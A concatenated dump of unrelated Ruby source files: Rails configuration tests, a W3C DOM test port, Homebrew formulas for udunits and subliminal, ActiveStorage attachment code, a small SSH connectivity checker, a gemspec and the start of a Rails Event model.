assert_equal "unicorn", Rails.application.config.my_custom_config[:key]
end
test "api_only is false by default" do
app "development"
assert_not Rails.application.config.api_only
end
test "api_only generator config is set when api_only is set" do
add_to_config <<-RUBY
config.api_only = true
RUBY
app "development"
Rails.application.load_generators
assert Rails.configuration.api_only
end
test "debug_exception_response_format is :api by default if api_only is enabled" do
add_to_config <<-RUBY
config.api_only = true
RUBY
app "development"
assert_equal :api, Rails.configuration.debug_exception_response_format
end
test "debug_exception_response_format can be overridden" do
add_to_config <<-RUBY
config.api_only = true
RUBY
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.debug_exception_response_format = :default
end
RUBY
app "development"
assert_equal :default, Rails.configuration.debug_exception_response_format
end
test "ActiveRecord::Base.has_many_inversing is true by default for new apps" do
app "development"
assert_equal true, ActiveRecord::Base.has_many_inversing
end
test "ActiveRecord::Base.has_many_inversing is false by default for upgraded apps" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_equal false, ActiveRecord::Base.has_many_inversing
end
test "ActiveRecord::Base.has_many_inversing can be configured via config.active_record.has_many_inversing" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_1.rb", <<-RUBY
Rails.application.config.active_record.has_many_inversing = true
RUBY
app "development"
assert_equal true, ActiveRecord::Base.has_many_inversing
end
test "ActiveSupport::MessageEncryptor.use_authenticated_message_encryption is true by default for new apps" do
app "development"
assert_equal true, ActiveSupport::MessageEncryptor.use_authenticated_message_encryption
end
test "ActiveSupport::MessageEncryptor.use_authenticated_message_encryption is false by default for upgraded apps" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_equal false, ActiveSupport::MessageEncryptor.use_authenticated_message_encryption
end
test "ActiveSupport::MessageEncryptor.use_authenticated_message_encryption can be configured via config.active_support.use_authenticated_message_encryption" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.active_support.use_authenticated_message_encryption = true
RUBY
app "development"
assert_equal true, ActiveSupport::MessageEncryptor.use_authenticated_message_encryption
end
test "ActiveSupport::Digest.hash_digest_class is Digest::SHA1 by default for new apps" do
app "development"
assert_equal Digest::SHA1, ActiveSupport::Digest.hash_digest_class
end
test "ActiveSupport::Digest.hash_digest_class is Digest::MD5 by default for upgraded apps" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_equal Digest::MD5, ActiveSupport::Digest.hash_digest_class
end
test "ActiveSupport::Digest.hash_digest_class can be configured via config.active_support.use_sha1_digests" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.active_support.use_sha1_digests = true
RUBY
app "development"
assert_equal Digest::SHA1, ActiveSupport::Digest.hash_digest_class
end
test "custom serializers should be able to set via config.active_job.custom_serializers in an initializer" do
class ::DummySerializer < ActiveJob::Serializers::ObjectSerializer; end
app_file "config/initializers/custom_serializers.rb", <<-RUBY
Rails.application.config.active_job.custom_serializers << DummySerializer
RUBY
app "development"
assert_includes ActiveJob::Serializers.serializers, DummySerializer
end
test "ActionView::Helpers::FormTagHelper.default_enforce_utf8 is false by default" do
app "development"
assert_equal false, ActionView::Helpers::FormTagHelper.default_enforce_utf8
end
test "ActionView::Helpers::FormTagHelper.default_enforce_utf8 is true in an upgraded app" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "5.2"'
app "development"
assert_equal true, ActionView::Helpers::FormTagHelper.default_enforce_utf8
end
test "ActionView::Helpers::FormTagHelper.default_enforce_utf8 can be configured via config.action_view.default_enforce_utf8" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.action_view.default_enforce_utf8 = true
RUBY
app "development"
assert_equal true, ActionView::Helpers::FormTagHelper.default_enforce_utf8
end
test "ActionView::Template.finalize_compiled_template_methods is true by default" do
app "test"
assert_deprecated do
ActionView::Template.finalize_compiled_template_methods
end
end
test "ActionView::Template.finalize_compiled_template_methods can be configured via config.action_view.finalize_compiled_template_methods" do
app_file "config/environments/test.rb", <<-RUBY
Rails.application.configure do
config.action_view.finalize_compiled_template_methods = false
end
RUBY
app "test"
assert_deprecated do
ActionView::Template.finalize_compiled_template_methods
end
end
test "ActiveJob::Base.retry_jitter is 0.15 by default" do
app "development"
assert_equal 0.15, ActiveJob::Base.retry_jitter
end
test "ActiveJob::Base.retry_jitter can be set by config" do
app "development"
Rails.application.config.active_job.retry_jitter = 0.22
assert_equal 0.22, ActiveJob::Base.retry_jitter
end
test "ActiveJob::Base.return_false_on_aborted_enqueue is true by default" do
app "development"
assert_equal true, ActiveJob::Base.return_false_on_aborted_enqueue
end
test "ActiveJob::Base.return_false_on_aborted_enqueue is false in the 5.x defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "5.2"'
app "development"
assert_equal false, ActiveJob::Base.return_false_on_aborted_enqueue
end
test "ActiveJob::Base.return_false_on_aborted_enqueue can be configured in the new framework defaults" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.active_job.return_false_on_aborted_enqueue = true
RUBY
app "development"
assert_equal true, ActiveJob::Base.return_false_on_aborted_enqueue
end
test "ActiveJob::Base.skip_after_callbacks_if_terminated is true by default" do
app "development"
assert_equal true, ActiveJob::Base.skip_after_callbacks_if_terminated
end
test "ActiveJob::Base.skip_after_callbacks_if_terminated is false in the 6.0 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.0"'
app "development"
assert_equal false, ActiveJob::Base.skip_after_callbacks_if_terminated
end
test "Rails.application.config.action_dispatch.cookies_same_site_protection is :lax by default" do
app "production"
assert_equal :lax, Rails.application.config.action_dispatch.cookies_same_site_protection
end
test "Rails.application.config.action_dispatch.cookies_same_site_protection is :lax can be overridden" do
app_file "config/environments/production.rb", <<~RUBY
Rails.application.configure do
config.action_dispatch.cookies_same_site_protection = :strict
end
RUBY
app "production"
assert_equal :strict, Rails.application.config.action_dispatch.cookies_same_site_protection
end
test "Rails.application.config.action_dispatch.cookies_same_site_protection is :lax in 6.1 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.1"'
app "development"
assert_equal :lax, Rails.application.config.action_dispatch.cookies_same_site_protection
end
test "ActiveSupport.utc_to_local_returns_utc_offset_times is true in 6.1 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.1"'
app "development"
assert_equal true, ActiveSupport.utc_to_local_returns_utc_offset_times
end
test "ActiveSupport.utc_to_local_returns_utc_offset_times is false in 6.0 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.0"'
app "development"
assert_equal false, ActiveSupport.utc_to_local_returns_utc_offset_times
end
test "ActiveSupport.utc_to_local_returns_utc_offset_times can be configured in an initializer" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "6.0"'
app_file "config/initializers/new_framework_defaults_6_1.rb", <<-RUBY
ActiveSupport.utc_to_local_returns_utc_offset_times = true
RUBY
app "development"
assert_equal true, ActiveSupport.utc_to_local_returns_utc_offset_times
end
test "ActiveStorage.queues[:analysis] is :active_storage_analysis by default" do
app "development"
assert_equal :active_storage_analysis, ActiveStorage.queues[:analysis]
end
test "ActiveStorage.queues[:analysis] is nil without Rails 6 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_nil ActiveStorage.queues[:analysis]
end
test "ActiveStorage.queues[:purge] is :active_storage_purge by default" do
app "development"
assert_equal :active_storage_purge, ActiveStorage.queues[:purge]
end
test "ActiveStorage.queues[:purge] is nil without Rails 6 defaults" do
remove_from_config '.*config\.load_defaults.*\n'
app "development"
assert_nil ActiveStorage.queues[:purge]
end
test "ActionDispatch::Response.return_only_media_type_on_content_type is false by default" do
app "development"
assert_equal false, ActionDispatch::Response.return_only_media_type_on_content_type
end
test "ActionDispatch::Response.return_only_media_type_on_content_type is true in the 5.x defaults" do
remove_from_config '.*config\.load_defaults.*\n'
add_to_config 'config.load_defaults "5.2"'
app "development"
assert_equal true, ActionDispatch::Response.return_only_media_type_on_content_type
end
test "ActionDispatch::Response.return_only_media_type_on_content_type can be configured in the new framework defaults" do
remove_from_config '.*config\.load_defaults.*\n'
app_file "config/initializers/new_framework_defaults_6_0.rb", <<-RUBY
Rails.application.config.action_dispatch.return_only_media_type_on_content_type = false
RUBY
app "development"
assert_equal false, ActionDispatch::Response.return_only_media_type_on_content_type
end
test "ActionMailbox.logger is Rails.logger by default" do
app "development"
assert_equal Rails.logger, ActionMailbox.logger
end
test "ActionMailbox.logger can be configured" do
app_file "lib/my_logger.rb", <<-RUBY
require "logger"
class MyLogger < ::Logger
end
RUBY
add_to_config <<-RUBY
require "my_logger"
config.action_mailbox.logger = MyLogger.new(STDOUT)
RUBY
app "development"
assert_equal "MyLogger", ActionMailbox.logger.class.name
end
test "ActionMailbox.incinerate_after is 30.days by default" do
app "development"
assert_equal 30.days, ActionMailbox.incinerate_after
end
test "ActionMailbox.incinerate_after can be configured" do
add_to_config <<-RUBY
config.action_mailbox.incinerate_after = 14.days
RUBY
app "development"
assert_equal 14.days, ActionMailbox.incinerate_after
end
test "ActionMailbox.queues[:incineration] is :action_mailbox_incineration by default" do
app "development"
assert_equal :action_mailbox_incineration, ActionMailbox.queues[:incineration]
end
test "ActionMailbox.queues[:incineration] can be configured" do
add_to_config <<-RUBY
config.action_mailbox.queues.incineration = :another_queue
RUBY
app "development"
assert_equal :another_queue, ActionMailbox.queues[:incineration]
end
test "ActionMailbox.queues[:routing] is :action_mailbox_routing by default" do
app "development"
assert_equal :action_mailbox_routing, ActionMailbox.queues[:routing]
end
test "ActionMailbox.queues[:routing] can be configured" do
add_to_config <<-RUBY
config.action_mailbox.queues.routing = :another_queue
RUBY
app "development"
assert_equal :another_queue, ActionMailbox.queues[:routing]
end
test "ActionMailer::Base.delivery_job is ActionMailer::MailDeliveryJob by default" do
app "development"
assert_equal ActionMailer::MailDeliveryJob, ActionMailer::Base.delivery_job
end
test "ActiveRecord::Base.filter_attributes should equal to filter_parameters" do
app_file "config/initializers/filter_parameters_logging.rb", <<-RUBY
Rails.application.config.filter_parameters += [ :password, :credit_card_number ]
RUBY
app "development"
assert_equal [ :password, :credit_card_number ], Rails.application.config.filter_parameters
assert_equal [ :password, :credit_card_number ], ActiveRecord::Base.filter_attributes
end
test "ActiveStorage.routes_prefix can be configured via config.active_storage.routes_prefix" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.active_storage.routes_prefix = '/files'
end
RUBY
output = rails("routes", "-g", "active_storage")
assert_equal <<~MESSAGE, output
Prefix Verb URI Pattern Controller#Action
rails_service_blob GET /files/blobs/:signed_id/*filename(.:format) active_storage/blobs#show
rails_blob_representation GET /files/representations/:signed_blob_id/:variation_key/*filename(.:format) active_storage/representations#show
rails_disk_service GET /files/disk/:encoded_key/*filename(.:format) active_storage/disk#show
update_rails_disk_service PUT /files/disk/:encoded_token(.:format) active_storage/disk#update
rails_direct_uploads POST /files/direct_uploads(.:format) active_storage/direct_uploads#create
MESSAGE
end
test "ActiveStorage.draw_routes can be configured via config.active_storage.draw_routes" do
app_file "config/environments/development.rb", <<-RUBY
Rails.application.configure do
config.active_storage.draw_routes = false
end
RUBY
output = rails("routes")
assert_not_includes(output, "rails_service_blob")
assert_not_includes(output, "rails_blob_representation")
assert_not_includes(output, "rails_disk_service")
assert_not_includes(output, "update_rails_disk_service")
assert_not_includes(output, "rails_direct_uploads")
end
test "hosts include .localhost in development" do
app "development"
assert_includes Rails.application.config.hosts, ".localhost"
end
test "disable_sandbox is false by default" do
app "development"
assert_equal false, Rails.configuration.disable_sandbox
end
test "disable_sandbox can be overridden" do
add_to_config <<-RUBY
config.disable_sandbox = true
RUBY
app "development"
assert Rails.configuration.disable_sandbox
end
test "rake_eager_load is false by default" do
app "development"
assert_equal false, Rails.application.config.rake_eager_load
end
test "rake_eager_load is set correctly" do
add_to_config <<-RUBY
config.root = "#{app_path}"
config.rake_eager_load = true
RUBY
app "development"
assert_equal true, Rails.application.config.rake_eager_load
end
private
def set_custom_config(contents, config_source = "custom".inspect)
app_file "config/custom.yml", contents
add_to_config <<~RUBY
config.my_custom_config = config_for(#{config_source})
RUBY
end
end
end
| 30.633526 | 163 | 0.685096 |
280908d8d05a9818f6b1e56c06979daafec4cfca | 3,648 |
###
# This Ruby source file was generated by test-to-ruby.xsl
# and is a derived work from the source document.
# The source document contained the following notice:
=begin
Copyright (c) 2001-2004 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio University). All
Rights Reserved. This program is distributed under the W3C's Software
Intellectual Property License. This program is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.
See W3C License http://www.w3.org/Consortium/Legal/ for more details.
=end
#
require File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..', 'helper'))
###
# The "setAttribute(name,value)" method for an attribute causes the
# DOMException NO_MODIFICATION_ALLOWED_ERR to be raised
# if the node is readonly.
#
# Obtain the children of the THIRD "gender" element. The elements
# content is an entity reference. Try to remove the "domestic" attribute
# from the entity reference by executing the "setAttribute(name,value)" method.
# This causes a NO_MODIFICATION_ALLOWED_ERR DOMException to be thrown.
# @author NIST
# @author Mary Brady
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#xpointer(id('ID-258A00AF')/constant[@name='NO_MODIFICATION_ALLOWED_ERR'])]
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#ID-F68F082]
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#xpointer(id('ID-F68F082')/raises/exception[@name='DOMException']/descr/p[substring-before(.,':')='NO_MODIFICATION_ALLOWED_ERR'])]
# see[http://www.w3.org/TR/1998/REC-DOM-Level-1-19981001/level-one-core#ID-F68F082]
##
DOMTestCase('elementsetattributenomodificationallowederr') do

  ###
  # Fixture setup.
  #
  # The upstream Java harness configured the parser with
  # DocumentBuilderSetting.notExpandEntityReferences before loading; this
  # port relies on the harness defaults and simply preloads the "staff"
  # document for the detected content type.
  ##
  def setup
    content_type = getContentType()
    preload(content_type, "staff", true)
  end

  ###
  # Calling setAttribute(name, value) on an element that lives inside an
  # entity reference (a readonly subtree) must raise DOMException with code
  # NO_MODIFICATION_ALLOWED_ERR.
  ##
  def test_elementsetattributenomodificationallowederr
    doc = load_document("staff", true)
    gender_nodes = doc.getElementsByTagName("gender")
    third_gender = gender_nodes.item(2)

    entity_ref = third_gender.firstChild()
    assert_not_nil(entity_ref, "entRefNotNull")

    entity_element = entity_ref.firstChild()
    assert_not_nil(entity_element, "entElementNotNull")

    raised_expected_error = false
    begin
      entity_element.setAttribute("newAttr", "newValue")
    rescue Taka::DOMException => ex
      raised_expected_error = (ex.code == Taka::DOMException::NO_MODIFICATION_ALLOWED_ERR)
    end
    assert(raised_expected_error, "throw_NO_MODIFICATION_ALLOWED_ERR")
  end

  ###
  # URI identifying this test in the W3C DOM Test Suite.
  ##
  def targetURI
    "http://www.w3.org/2001/DOM-Test-Suite/tests/Level-1/elementsetattributenomodificationallowederr"
  end
end
| 35.764706 | 201 | 0.7267 |
0130439cf1a3f3a2c9ee950d70bfba6c195cd2ca | 954 | class Udunits < Formula
desc "Unidata unit conversion library"
homepage "https://www.unidata.ucar.edu/software/udunits/"
url "ftp://ftp.unidata.ucar.edu/pub/udunits/udunits-2.2.26.tar.gz"
sha256 "368f4869c9c7d50d2920fa8c58654124e9ed0d8d2a8c714a9d7fdadc08c7356d"
bottle do
sha256 "5d06e98f43d762c488ee32fdafcd11c6a1ba1e1527fb176cd2558a465701bfc1" => :mojave
sha256 "9bb90283343d3490d247eda07024cbdfa68b1dbc5255d2697c73ed2e73a29799" => :high_sierra
sha256 "754d3116eb032cc012c164b0a5edea7432f6e6a4b2853a9b7153e560dfb9075a" => :sierra
sha256 "5fbd4d1d36e471bc71720b61a1d4a76b363e115fc71b74208fc5284883087bda" => :el_capitan
end
# Builds and installs udunits with the standard Homebrew configure flags.
def install
  args = %W[
    --disable-debug
    --disable-dependency-tracking
    --prefix=#{prefix}
  ]
  system "./configure", *args
  system "make", "install"
end
# Sanity check: ask udunits2 to convert kilograms to grams.
test do
  output = shell_output("#{bin}/udunits2 -H kg -W g")
  assert_match(/1 kg = 1000 g/, output)
end
end
| 38.16 | 93 | 0.726415 |
f763d372788c197d00b99e2c420a0c9104b0b633 | 45 | module Representatives::ClassroomsHelper
end
| 15 | 40 | 0.888889 |
ed1554d0dbb374361b3be328546af3d1fbc3a5c1 | 5,458 | class Subliminal < Formula
desc "Library to search and download subtitles"
homepage "https://subliminal.readthedocs.org"
url "https://github.com/Diaoul/subliminal/archive/1.0.1.tar.gz"
sha256 "b2db67d6a6d68c3fc5a2fda9ee5831879548c288af61de726cae508d72fc4816"
head "https://github.com/Diaoul/subliminal.git"
bottle do
cellar :any
sha256 "29d0af54b61269c0e371494ebb56429afc6a98e6e21423e692c25c367af2a07d" => :yosemite
sha256 "8f3eff7ac992dce702753f2058c1c9513567658d2928e5dc82634db5f8df07cc" => :mavericks
sha256 "419f7156a3b2cce921860d39dba17cdcb544b910c8223aa4e4fa1cf68a29950f" => :mountain_lion
end
depends_on :python if MacOS.version <= :snow_leopard
resource "pip" do
url "https://pypi.python.org/packages/source/p/pip/pip-7.1.0.tar.gz"
sha256 "d5275ba3221182a5dd1b6bcfbfc5ec277fb399dd23226d6fa018048f7e0f10f2"
end
resource "wsgiref" do
url "https://pypi.python.org/packages/source/w/wsgiref/wsgiref-0.1.2.zip"
sha256 "c7e610c800957046c04c8014aab8cce8f0b9f0495c8cd349e57c1f7cabf40e79"
end
resource "chardet" do
url "https://pypi.python.org/packages/source/c/chardet/chardet-2.3.0.tar.gz"
sha256 "e53e38b3a4afe6d1132de62b7400a4ac363452dc5dfcf8d88e8e0cce663c68aa"
end
resource "guessit" do
url "https://pypi.python.org/packages/source/g/guessit/guessit-0.10.3.tar.gz"
sha256 "d14ea0a2ea3413ec46119ea4d7a91b1f045761cfb3dc262c9dcd545742712dfe"
end
resource "requests" do
url "https://pypi.python.org/packages/source/r/requests/requests-2.7.0.tar.gz"
sha256 "398a3db6d61899d25fd4a06c6ca12051b0ce171d705decd7ed5511517b4bb93d"
end
resource "dogpile.cache" do
url "https://pypi.python.org/packages/source/d/dogpile.cache/dogpile.cache-0.5.6.tar.gz"
sha256 "f80544c5555f66cf7b5fc99f15431f3b35f78009bc6b03b58fe1724236bbc57b"
end
resource "beautifulsoup4" do
url "https://pypi.python.org/packages/source/b/beautifulsoup4/beautifulsoup4-4.4.0.tar.gz"
sha256 "fad91da88f69438b9ba939ab1b2cabaa31b1d914f1cccb4bb157a993ed2917f6"
end
resource "click" do
url "https://pypi.python.org/packages/source/c/click/click-4.1.tar.gz"
sha256 "e339ed09f25e2145314c902a870bc959adcb25653a2bd5cc1b48d9f56edf8ed8"
end
resource "enzyme" do
url "https://pypi.python.org/packages/source/e/enzyme/enzyme-0.4.1.tar.gz"
sha256 "f2167fa97c24d1103a94d4bf4eb20f00ca76c38a37499821049253b2059c62bb"
end
resource "pysrt" do
url "https://pypi.python.org/packages/source/p/pysrt/pysrt-1.0.1.tar.gz"
sha256 "5300a1584c8d15a1c49ef8880fa1ef7a4274ce3f24dde83ad581d12d875f6784"
end
resource "stevedore" do
url "https://pypi.python.org/packages/source/s/stevedore/stevedore-1.6.0.tar.gz"
sha256 "dab2aa31ec742f651e6a2fe0429560aebbbe0fb7fc462fa0ff565c8f5ff2ec25"
end
resource "six" do
url "https://pypi.python.org/packages/source/s/six/six-1.9.0.tar.gz"
sha256 "e24052411fc4fbd1f672635537c3fc2330d9481b18c0317695b46259512c91d5"
end
resource "babelfish" do
url "https://pypi.python.org/packages/source/b/babelfish/babelfish-0.5.4.tar.gz"
sha256 "6e4f41f185b30b81232589c10b059546f3320cc440c5987f182ee82ab1778b47"
end
resource "python-dateutil" do
url "https://pypi.python.org/packages/source/p/python-dateutil/python-dateutil-2.4.2.tar.gz"
sha256 "3e95445c1db500a344079a47b171c45ef18f57d188dffdb0e4165c71bea8eb3d"
end
resource "dogpile.core" do
url "https://pypi.python.org/packages/source/d/dogpile.core/dogpile.core-0.4.1.tar.gz"
sha256 "be652fb11a8eaf66f7e5c94d418d2eaa60a2fe81dae500f3743a863cc9dbed76"
end
resource "argparse" do
url "https://pypi.python.org/packages/source/a/argparse/argparse-1.3.0.tar.gz"
sha256 "b3a79a23d37b5a02faa550b92cbbbebeb4aa1d77e649c3eb39c19abf5262da04"
end
resource "pbr" do
url "https://pypi.python.org/packages/source/p/pbr/pbr-1.3.0.tar.gz"
sha256 "1a6f8d514fc11d2571c75c207d932c106f024f199b5f12d25f8ca022b026c59d"
end
resource "pyxdg" do
url "https://pypi.python.org/packages/source/p/pyxdg/pyxdg-0.25.tar.gz"
sha256 "81e883e0b9517d624e8b0499eb267b82a815c0b7146d5269f364988ae031279d"
end
resource "html5lib" do
url "https://pypi.python.org/packages/source/h/html5lib/html5lib-0.999999.tar.gz"
sha256 "e372b66f4997f8e1de970ea755d0a528d7222d2aa9bd55aac078c7ef39b8f6c3"
end
# not required by install_requires but provides additional UI when available
resource "colorlog" do
url "https://pypi.python.org/packages/source/c/colorlog/colorlog-2.6.0.tar.gz"
sha256 "0f03ae0128a1ac2e22ec6a6617efbd36ab00d4b2e1c49c497e11854cf24f1fe9"
end
# Vendors every declared Python resource into libexec/"vendor", then installs
# subliminal itself into libexec and exposes wrapped launcher scripts.
# NOTE: the two PYTHONPATH prepends must happen in this order so the vendored
# dependencies are importable while subliminal is being installed.
def install
  ENV.prepend_create_path "PYTHONPATH", libexec/"vendor/lib/python2.7/site-packages"
  # Stage and install each pure-Python dependency into the vendor tree.
  resources.each do |r|
    r.stage do
      system "python", *Language::Python.setup_install_args(libexec/"vendor")
    end
  end
  # dogpile is a namespace package and .pth files aren't read from our
  # vendor site-packages
  touch libexec/"vendor/lib/python2.7/site-packages/dogpile/__init__.py"
  ENV.prepend_create_path "PYTHONPATH", libexec/"lib/python2.7/site-packages"
  system "python", *Language::Python.setup_install_args(libexec)
  bin.install Dir[libexec/"bin/*"]
  # Wrap the executables so they see the vendored PYTHONPATH at runtime.
  bin.env_script_all_files(libexec/"bin", :PYTHONPATH => ENV["PYTHONPATH"])
end
# Exercises the CLI: attempt an English subtitle download for a sample release.
test do
  mkdir ".config" # subliminal expects a writable config directory under HOME
  args = ["download", "-l", "en",
          "--", "The.Big.Bang.Theory.S05E18.HDTV.x264-LOL.mp4"]
  system "#{bin}/subliminal", *args
end
end
| 38.43662 | 96 | 0.76878 |
913b534f52ffc36d479aafbe547f6903b45ebdee | 2,260 | # frozen_string_literal: true
module ActiveStorage
  # Decorated proxy object representing a record's collection of attachments.
  class Attached::Many < Attached
    delegate_missing_to :attachments

    # Returns all the associated attachment records.
    #
    # Any method called on this proxy that is not defined here is forwarded
    # to +attachments+ via +delegate_missing_to+ above.
    def attachments
      if change.present?
        change.attachments
      else
        record.public_send("#{name}_attachments")
      end
    end

    # Returns all attached blobs.
    def blobs
      if change.present?
        change.blobs
      else
        record.public_send("#{name}_blobs")
      end
    end

    # Attaches one or more +attachables+ to the record.
    #
    # When the record is persisted and unchanged, the attachments are saved to
    # the database immediately; otherwise they are staged and written when the
    # record is next saved.
    #
    #   document.images.attach(params[:images]) # Array of ActionDispatch::Http::UploadedFile objects
    #   document.images.attach(params[:signed_blob_id]) # Signed reference to blob from direct upload
    #   document.images.attach(io: File.open("/path/to/racecar.jpg"), filename: "racecar.jpg", content_type: "image/jpg")
    #   document.images.attach([ first_blob, second_blob ])
    def attach(*attachables)
      incoming = attachables.flatten
      if record.persisted? && !record.changed?
        record.public_send("#{name}=", blobs + incoming)
        record.save
      else
        staged = change&.attachables || blobs
        record.public_send("#{name}=", staged + incoming)
      end
    end

    # Returns true if any attachments have been made.
    #
    #   class Gallery < ApplicationRecord
    #     has_many_attached :photos
    #   end
    #
    #   Gallery.new.photos.attached? # => false
    def attached?
      attachments.any?
    end

    # Deletes associated attachments without purging them, leaving their
    # respective blobs in place.
    def detach
      return unless attached?

      attachments.delete_all
    end

    ##
    # :method: purge
    #
    # Directly purges each associated attachment (i.e. destroys the blobs and
    # attachments and deletes the files on the service).

    ##
    # :method: purge_later
    #
    # Purges each associated attachment through the queuing system.
  end
end
| 33.731343 | 121 | 0.683186 |
7a5f7b157924f90155cb5ed96fc652c0f2e3b72d | 387 | class Bin < ActiveRecord::Base
# Obfuscates this record's id for external use: offsets the id by 1000,
# appends one random digit (1-8), reverses the resulting digit string and
# encodes it in base 36.
#
# NOTE(review): output is non-deterministic (random digit per call), so two
# calls for the same record yield different strings — confirm callers expect
# that.
def encode_id
  # The original bound a local named `rand`, shadowing Kernel#rand; use a
  # descriptive name instead.
  random_digit = (1 + rand(8)).to_s
  offset_id = (self.id + 1000).to_s
  (offset_id + random_digit).reverse.to_i.to_s(36)
end
end
| 21.5 | 56 | 0.573643 |
eda00ef2957ba9809760c7940b063414eb56dc81 | 1,007 | #!/usr/bin/env ruby
require 'net/ssh'
module SshCon
  # Opens an SSH session to +host+ as root using a fixed private key and runs
  # a probe command ("echo test"), returning whatever that command wrote to
  # stderr ("" on a healthy connection). Returns the sentinel string
  # "can not connect via ssh" when the connection cannot be established.
  #
  # NOTE(review): the key path is hardcoded; consider making it configurable.
  def self.connect(host)
    opt = {
      :keys => '/home/thirai/novakey01',
      :passphrase => '',
      :port => 22
    }
    Net::SSH.start(host, 'root', opt) do |ssh|
      stderr = ""
      ssh.exec!("echo test") do |_channel, stream, data|
        stderr << data if stream == :stderr
      end
      return stderr
    end
  rescue Net::SSH::Exception, SocketError, SystemCallError, Timeout::Error
    # Was a bare `rescue`, which also swallowed programming errors
    # (NoMethodError etc.); only connection-related failures map to the
    # sentinel string now.
    "can not connect via ssh"
  end
end
# Probes SSH connectivity to +ipaddr+ as +user+ with key file +key+
# (10 second timeout). Returns 'ok' on success; on a known failure it
# assigns a short description to @error and returns that string (the
# rescue-branch assignment is the method's return value, preserving the
# original behaviour).
def check_ssh(ipaddr, user, key)
  host_key_retried = false
  begin
    # Redundant "#{...}" interpolations around already-string args removed.
    Net::SSH.start(ipaddr, user, :keys => [key], :passphrase => '', :timeout => 10) do |_ssh|
      return 'ok'
    end
  rescue Timeout::Error
    @error = "Timed out"
  rescue Errno::EHOSTUNREACH
    @error = "Host unreachable"
  rescue Errno::ECONNREFUSED
    @error = "Connection refused"
  rescue Net::SSH::AuthenticationFailed
    @error = "Authentication failure"
  rescue Net::SSH::HostKeyMismatch => e
    puts "remembering new key: #{e.fingerprint}"
    e.remember_host!
    # Retry once after remembering the new host key; the original retried
    # unconditionally, which could loop forever on a persistent mismatch.
    unless host_key_retried
      host_key_retried = true
      retry
    end
  end
end
| 22.886364 | 107 | 0.607746 |
5debe2ac5cd702f5cc1ebe781b1f98d4f7017b41 | 911 | #!/usr/bin/env ruby
require 'rubygems'

# Gem specification for m4dbi ("Models (and More) for DBI").
spec = Gem::Specification.new do |s|
  s.name        = 'm4dbi'
  s.version     = '0.6.3'
  s.summary     = 'Models (and More) for DBI'
  s.description = 'M4DBI provides models, associations and some convenient extensions to Ruby DBI.'
  s.homepage    = 'http://purepistos.net/m4dbi'
  s.rubyforge_project = 'm4dbi'
  s.add_dependency('metaid')
  s.add_dependency('dbi')
  s.requirements << 'bacon (optional)'
  s.authors = ['Pistos']
  s.email   = 'pistos at purepistos dot net'
  # s.platform = Gem::Platform::RUBY
  s.files = [
    'HIM',
    'READHIM',
    'CHANGELOG',
    'LICENCE',
    *Dir['lib/**/*.rb', 'spec/**/*.rb']
  ]
  s.extra_rdoc_files = ['HIM', 'READHIM', 'CHANGELOG', 'LICENCE']
  s.test_files = Dir.glob('spec/*.rb')
end

# Build the gem when this file is executed directly.
# NOTE(review): Gem::Builder was removed in RubyGems 2.0; modern tooling uses
# `gem build` instead — confirm which RubyGems versions must be supported.
if $PROGRAM_NAME == __FILE__
  Gem::Builder.new(spec).build
end
21d162cb1e2d7bf1c778e78b1b41341a47d104ef | 8,687 | # rubocop:disable Layout/LineLength, Lint/RedundantCopDisableDirective
# == Schema Information
#
# Table name: events
#
# id :integer not null, primary key
# additional_info :jsonb
# admin_notes :text
# age_restrictions_description :text
# author :string
# can_play_concurrently :boolean default(FALSE), not null
# con_mail_destination :string
# content_warnings :text
# description :text
# email :string
# length_seconds :integer not null
# minimum_age :integer
# organization :string
# participant_communications :text
# private_signup_list :boolean default(FALSE), not null
# registration_policy :jsonb
# short_blurb :text
# status :string default("active"), not null
# team_mailing_list_name :text
# title :string not null
# title_vector :tsvector
# url :text
# created_at :datetime
# updated_at :datetime
# convention_id :integer
# event_category_id :bigint not null
# owner_id :integer
# updated_by_id :integer
#
# Indexes
#
# index_events_on_convention_id (convention_id)
# index_events_on_event_category_id (event_category_id)
# index_events_on_owner_id (owner_id)
# index_events_on_title_vector (title_vector) USING gin
# index_events_on_updated_by_id (updated_by_id)
#
# Foreign Keys
#
# fk_rails_... (convention_id => conventions.id)
# fk_rails_... (event_category_id => event_categories.id)
# fk_rails_... (owner_id => users.id)
# fk_rails_... (updated_by_id => users.id)
#
# rubocop:enable Layout/LineLength, Lint/RedundantCopDisableDirective
# rubocop:disable Metrics/LineLength, Lint/RedundantCopDisableDirective
class Event < ApplicationRecord
include AgeRestrictions
include EventEmail
include FormResponse
